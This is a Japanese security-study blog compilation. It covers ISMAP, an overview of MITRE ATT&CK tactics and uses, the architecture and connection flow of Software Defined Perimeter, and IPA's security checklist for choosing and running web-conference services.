f:id:iestudy:20201021135353p:plain

ISMAPの動向

ISMAPは政府機関向けのものですが、国が策定したこと基準であるため、日本の企業においてもクラウドサービスを選ぶ際の指針として活用できると考えられます。

 

参考にさせていただいたサイト

www.ipa.go.jp

https://www.ipa.go.jp/files/000082669.pdf

 

 

 

MITRE ATT&CKの概要

ガイドライン セキュリティ

MITERとは

MITREは、米国の連邦政府が資金を提供する非営利組織であり、国の安全性に関する事項に取り組んでいます。サイバーセキュリティの分野では、NISTの連邦研究開発センター(Federally funded research and development center:FFRDC)の運営を行い、官民パートナーシップおよびハブとしての機能を提供しています。また、国土安全保障省(DHS)の資金を得て、世界中の脆弱性情報に対して採番を行うCVE(Common Vulnerabilities and Exposures、共通脆弱性識別子) の運用を行っています。

 

 

 

MITRE ATT&CKの概要

MITERのATT&CK(Adversarial Tactics, Techniques, and Common Knowledge)は、直訳すると「敵対的な戦術とテクニック、共通知識」です。ATT&CK は上記のCVEをもとに、脆弱性を悪用した実際の攻撃を戦術と技術または手法の観点で分類したナレッジベースです。この戦術とは、初期侵入、悪意あるプログラムの実行、永続性、特権昇格、防御回避、認証情報アクセス、探索、水平展開、情報収集、C&C、情報送信、影響(Impact) に分類されています。そして、戦術ごとに個別の攻撃の手法や、緩和策等、セキュリティベンダー等が提供しているリンクが記載されています。

MITRE ATT&CKは、さらにエンタープライズ向け、モバイル向け、産業用制御システム向けの3つの分野に分けて戦術を分類しています。エンタープライズ向けではOSやプラットフォーム別に紹介されています。

f:id:iestudy:20200729125446p:plain

エンタープライズのマトリクス

 

ATT&CKの戦術(Tactics)

ATT&CKでは12種類の戦術を定義しています。攻撃者は、初期アクセスから順番に攻撃を行います。攻撃を行い、最後の影響(Impact)のまで進め、目的を達成します。

戦術 概要
初期アクセス(Initial Access) 攻撃者がネットワークに侵入しようとしている。
実行(Execution) 攻撃者が悪意のあるコードを実行しようとしている。
永続化(Persistence) 攻撃者が不正アクセスする環境を確保しようとしている。
権限昇格(Privilege Escalation) 攻撃者がより高いレベルの権限を取得しようとしている。
防衛回避(Defense Evasion) 攻撃者が検知されないようにしようとしている。
認証情報アクセス(Credential Access) 攻撃者がアカウント名とパスワードを盗もうとしている。
探索(Discovery) 攻撃者がアクセス先の環境を理解しようとしている。
水平展開(Lateral Movement) 攻撃者がアクセス先の環境を移動しようとしている。
収集(Collection) 攻撃者が目標に関心のあるデータを収集しようとしている。
C&C(Command and Control) 攻撃者が侵害されたシステムと通信して制御しようとしている。
持ち出し(Exfiltration) 攻撃者がデータを盗もうとしている。
影響(Impact) 攻撃者がシステムとデータを操作、中断、または破壊しようとしている。

 

MITRE ATT&CKの利用方法

MITRE ATT&CKの利用法について、以下に記載します。

  • 攻撃者の攻撃を想定するシナリオの作成ツールとして
  • レッドチーム演習のプラン作成のためのツールとして
  • SOC(Security Operations Center)の成熟度評価
  • 脅威インテリジェンスの強化

 

ATT&CKとサイバーキルチェーンとの関連

サイバーキルチェーンとMITRE ATT&CKの関連について以下に記載します。

f:id:iestudy:20200729132425p:plain

サーバーキルチェーンとMITRE ATT&CKの関連性

PRE-ATT&CKはキルチェーンの前半の3段階(偵察、武器化、および配送)に関連し、ATT&CKは、後半の4段階(攻撃、インストール、遠隔操作、および目的実行)に関連します。

 

参考にさせていただいたサイト

www.anomali.com

www.intellilink.co.jp

 

 

SDP(Software Defined Perimeter)とは

セキュリティ ガイドライン クラウド

SDPの概要

Software Defined Perimeterは、ネットワークを経由した様々な脅威からインフラや情報を守るための機能です。

最近ではクラウドサービス(社外のサービス)等の活用が増え、従来のファイアウォール等を使った境界型セキュリティでは守り切れないものが出てきました。SDPは、上記の課題を解決するもので、「境界線(Perimeter)をソフトウェア上で構築、制御し、アクセス制御に関わる設定を柔軟に動的に変更して安全にデータを転送する」技術です。

SDPでは、ソフトウェアにより、常に動的に相手先のアドレスなどを決定するため、その通信経路を外部侵入者から発見されず、攻撃やデータ漏洩・侵害を防ぐ仕組みを提供します。

https://www.cloudsecurityalliance.jp/site/wp-content/uploads/2018/12/SDP_guide_160408_2.pdf

 

 

 

 

SDPの構成

SDP は、SDPホストとSDPコントローラで構成されます。SDPのホストには、接続の開始依頼を行うInitiating-SDPホストと接続相手のAccepting-SDPホストがあります。全てのやりとりは、SDPコントローラにて管理され、セキュリティで保護された制御チャネルを介して相互に実施され、「制御する機能」と「データを管理する機能」は分離されています。

f:id:iestudy:20200717094441p:plain

SDPの構成

 

SDPの構成要素

SDP コントローラ
SDP コントローラは、認証局、地理認証、外部の認証サーバなどと情報連携を行い、利用者のデバイス認証とID認証を行い、どのSDP ホストと通信を行うかを管理します。

 

Initiating-SDPホスト
Initiating-SDPホストは、接続の依頼元であり、本人認証、デバイス認証のため、SDP コントローラに接続します。Initiating-SDPホストは、ハードウェア、ソフトウェア等の情報をSDPコントローラに送り、ネットワーク上で識別が可能なIPアドレス等の情報が返信されることを待ちます。


Accepting-SDPホスト
Accepting-SDPホストは、SDPコントローラの要求を受けて接続を許可し、指定されたInitiating-SDPホストからの接続を待ちます。

 

SDPの動作の流れ

  1. SDPコントローラがオンラインとなります。
  2. Accepting-SDPホストは、SDPコントローラとセキュアなVPN 接続を確立します。
  3. Initiating-SDPホストは、SDPコントローラとセキュアな VPN 接続を確立します。
  4. SDPコントローラにて、Initiating-SDPホストから送られてきたデバイスと本人情報に基づいて認証を行い、Accepting-SDPホストが存在するかを確認します。
  5. 接続依頼が正しい場合、SDPコントローラは、Accepting-SDPホストに対して、Initiating-SDPホストからの接続要求を送ります。
  6. SDPコントローラは、Initiating-SDPホストに対して、アクセスが可能なAccepting-SDPホストのネットワーク情報を送ります。
  7. Initiating-SDPホストは、アクセスが許可された Accepting-SDP ホストに対して VPN 接続を依頼し、相互にInitiating-SDPホストとAccepting-SDPホストが通信を開始します。(一連の通信が終わり次第、当該の経路はなくなり、新たな接続要求によってのみ接続が再開されます。)


SDPの場合は、通信を開始にするにあたって、まずSDPコントローラに接続し、そこで認証を受けてから通信先にアクセスをするため、事前の認証が強化されており、また、接続先ホストのネットワーク情報は動的に個別に設定されるため、接続先ホストは任意の第3者からのアクセスを受けることはありません。

SDPはBell-LaPadula等と同様、Need to knowの考え方に基づいて考案されており、上記のようにセキュアな動作となります。

 

SDPのソリューション事例

Pulse Secure SDP

www.macnica.net

 

AppGate

enterprisezine.jp


Zscaler

www.softbank.jp

 

 

 

Web会議のセキュリティ注意事項について

ガイドライン セキュリティ

概要

コロナの影響もあり最近はリモートワークがに関する話題が多くなっています。それに伴い、Web会議のツールの利用も増えています。Web会議ツールは業務以外にもリモート飲みなどにも使われています。
そういった中で、独立行政法人情報処理推進機構は7月14日に「Web会議サービスを使用する際のセキュリティ上の注意事項」を公開しました。

www.ipa.go.jp

 

 

 

Web会議サービスを使用する際のセキュリティ上の注意事項(まとめ)

資料では最初にWeb会議サービス選定時の確認事項がまとめられています。

 

Web 会議サービス選定時に考慮すべきポイント

区分 詳細
会議データの所在
  • Web会議サービスの形態がクラウドサ-ビスかオンプレミかを確認する
  • クラウドサービスの場合は、データを格納する所在地を確認する。
    ※無料サービスでは契約プロセスを通さないため注意が必要
  • 会議で使用したデータの削除の可否
暗号化
  • 通信経路が暗号化されているかを確認する
  • 暗号化方式を確認する
    -Web会議サービス提供者が暗号鍵を持つ暗号方式か
    -サービス提供者が暗号鍵をもたないエンドツーエンドの暗号方式か
    -安全性が確認されている暗号アルゴリズムや通信方式が採用されているかを確認
会議参加者の確認・認証方式
  • 会議参加者の確認・認証方式の確認
    -会議パスワード設定機能
    -待機室(ロビー)での参加者確認機能
    -参加者の事前登録機能
    -参加者名の設定機能
    -二要素認証等の確認
    -参加者を強制退室できる機能の有無
プライバシーポリシー
  • 特に個人情報に関して、会議目的以外で第三者提供を含め使用されないことの確認
  • 個人情報保護法等の法律、規制に準拠していることを確認
脆弱性と企業姿勢
  • サービス提供者のウェブサイト、JVN iPedia、ニュース等の脆弱性情報を確認する。
    ※サービス提供者のセキュリティに対する取り組み姿勢と情報公開姿勢の確認
  • サービス提供各社のウェブサイト等で最新のセキュリティ対策状況を確認する。

 

Web 会議サービスを安全に開催するためのポイント

区分 詳細
会議の準備

(1)会議の機密性の確認

  • 会議の機密性を確認したか?
    セミナー・講演会と、経営情報・顧客情報等の機密情報を扱う会議では、会議の機密性が異なります。 それぞれに応じ最適な会議開催方法を選択する必要があります。まず、各組織の規則に従い会議の機密性を確認して下さい。

(2)会議の機密性に応じた Web 会議開催方法の決定
会議の機密性に応じて以下の項目を考慮し会議開催方法を決定します。

  • エンドツーエンド暗号化の会議は利用可能か?利用できない場合、サーバで万が一復号されるリスクは許容可能か?
  • 会議参加者に外部組織の人がいる場合には、それら組織のセキュリティポリシーに準拠しているかについての参加者の同意を得たか?
  • Web 会議サービス参加者の制限を明確にし、会議の設定を適切に行っているか?
  • 非公開会議の場合は、会議を非公開に設定する。
  • 意図しない参加者を避けるため、会議パスワードを設定し、待機室機能を有効にする。
  • 参加者の入室時に許可する機能(主催者以外全員ミュート状態等)を確認する。
  • 会議の機密性、会議参加者の人数に応じ、会議案内メールと別経路での会議パスワードの送付、参加者の二要素認証、参加者の事前登録機能等を適切に使用する。
  • 万が一意図しない参加者が登場した場合に備え、参加者の強制退室機能が使えることを確認したか?

(3)Web 会議開催案内

  • 会議 URL、会議パスワード等を記載した会議開催案内の送付経路は安全か?
    非公開会議の場合、ソーシャルメディア経由の案内は避けるべきです。
  • 機密性の高い会議の場合、万が一の案内メールの漏えいに備え、メールの題名は機密性を悟られない文面となっているか?
会議の実施

(1)参加者の確認

  • 組織外参加者がいる会議では特に、意図しない第三者が会議に参加しないよう、参加者確認業務の担当者を明確にしているか?
    参加者の確認方法としては、顔、声による確認も有効です。
  

(2)会議終了後のデータ削除

  • 会議録音・録画データ、共有資料、チャット等の会議データがクラウド上に存在する場合には、クライアント端末への移動・暗号化、クラウド上からの削除を実施したか?
その他の一般的注意事項

(1)会議で使用するクライアント端末のセキュリティについて

  • クライアント端末のセキュリティ対策は十分か?

基本的にはセキュリティ対策が十分に管理されている組織からの支給端末、または、BYOD(Bring Your Own Device)として組織から許可され一定のセキュリティ対策が施されている私物端末の使用が望まれます。

Web 会議サービスのクライアントソフト、および、クライアント端末の OS 等は、脆弱性の悪用を防ぐため常に最新の状態にアップデートを行う事が必要です。

Web 会議サービスのクライアントソフトをダウンロードする時は「偽サイト」に注意しましょう。 サービス提供者の公式サイトや公式マーケット等からダウンロードしてください。

(2)会議の参加環境

  • 機密情報および個人情報保護のために、意図しない映り込みや音声の漏えいを避けるよう、参加者端末の場所、映像の背景が配慮されているか?